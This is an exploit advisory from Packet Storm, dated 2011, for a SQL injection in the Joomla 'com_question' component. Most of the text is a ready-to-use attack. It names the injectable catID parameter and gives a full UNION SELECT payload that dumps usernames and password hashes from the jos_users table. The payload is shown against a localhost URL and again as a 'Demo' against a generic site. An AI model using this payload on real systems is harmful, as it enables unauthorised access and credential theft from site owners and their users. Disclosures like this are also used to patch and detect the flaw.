The Joomla Question component suffers from a remote SQL injection vulnerability.
6dd418f0a740678b728f1f1f691bc57f817b982b0d5d0a21edb1a6c1ba886caf###################################################
# |Title : Joomla (com_question) SQL Injection Vulnerability
# |Vendor : http://www.alex-ensdorf.de/
# |Version : Joomla 1.5
# |Date : 15/5/2011
# |Author : NeX HaCkEr
# |Contact : Error_log@hotmail.com
##################################################
# | Exploit :
# | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL]
# | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all
# | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Demo:
# | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20
##################################################
# | Greetz :
# | Dr.KAsBeR & DaShEr & MaFiA & WeeD
##################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed